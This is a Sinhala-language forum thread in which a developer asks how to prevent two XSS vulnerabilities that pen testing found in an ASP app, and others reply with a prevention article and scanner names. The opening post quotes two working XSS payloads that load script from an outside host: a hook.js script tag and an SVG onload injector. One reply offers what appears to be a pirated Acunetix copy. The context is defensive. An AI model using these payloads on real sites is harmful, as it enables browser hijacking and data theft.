XSS ඈටෑක් avoid කරන්නෙ කොහොමද? Big help

CorD SaC

Well-known member
  • Feb 4, 2015
    15,768
    28,131
    113
    XSS ඈටෑක් avoid කරන්නෙ කොහොමද? Big help



    මචන්ලා ASP වලින් ලියපු ඇප් එකක් තියෙනවා.මේකෙ pen testing කරලා XSS vulnerabilities දෙකක් අඩෙන්ටිෆයි කරලා තියෙනවා..මේ වගේ එකක් validate කරන්නෙ කොහොමද? input validate කරලද..නැත්නම් උඹලා යූස් කරන libraries මොනවා හරි තියේද :(

    මෙහෙම cheet දෙකක් යුස් කරලා තමා ටෙස්ට් කරලා තියෙන්නෙ...

    PHP:
    <script src="http://192.168.1.122:3000/hook.js"></script>
    
    <svg/onload=setInterval(function(){with(document)body.
    appendChild(createElement("script")).src="//HOST:PORT"},0)>

    මෙහෙම ඒවා avoid කරන විදිහ කියපන්කො
     

    CorD SaC

    Well-known member
  • Feb 4, 2015
    15,768
    28,131
    113

    :love::love:

    මොනා ගැනද බන් උබ ඒ කිව්වේ

    වැඩිය හිතන්න එපා ප්‍රෙන් :(

    https://www.checkmarx.com/2017/10/09/3-ways-prevent-xss/

    3 methods to avoid cross scripting

    Havij for cross scripting
    acunatix web valnarability scanner ekak use karanna

    Havij එක ෆ්‍රීද... acunatix නම් සල්ලි දීලා ගන්න ඕනිනෙ
     

    cr34zyb0t

    Well-known member
  • Dec 25, 2017
    894
    143
    63
    danne ne oi
    :love::love:



    වැඩිය හිතන්න එපා ප්‍රෙන් :(



    Havij එක ෆ්‍රීද... acunatix නම් සල්ලි දීලා ගන්න ඕනිනෙ

    Havij free version ekak have eka tiyenne xss attack walata kali linux metasploit wala Oya wage Tools tiyanawa..acunatix mma oyata dennam Free salli dila ganna epa
     

    CorD SaC

    Well-known member
  • Feb 4, 2015
    15,768
    28,131
    113
    Havij free version ekak have eka tiyenne xss attack walata kali linux metasploit wala Oya wage Tools tiyanawa..acunatix mma oyata dennam Free salli dila ganna epa

    එලම මචන්..එවන්නකො පුලුවන්නම් :) ඒකෙන් ටෙස්ට් කරන එක ලොකු කේස් එකක් නෑ නේද :)